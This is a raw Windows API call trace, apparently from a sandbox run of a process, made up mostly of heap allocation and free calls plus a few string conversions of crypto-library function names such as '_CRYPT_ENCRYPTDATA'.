CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7df0) returned 0x955018 [0036.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0036.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7df0) returned 0x964c08 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.234] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.235] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.235] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.236] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.237] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0036.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.238] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.239] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.239] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.240] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.240] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.240] 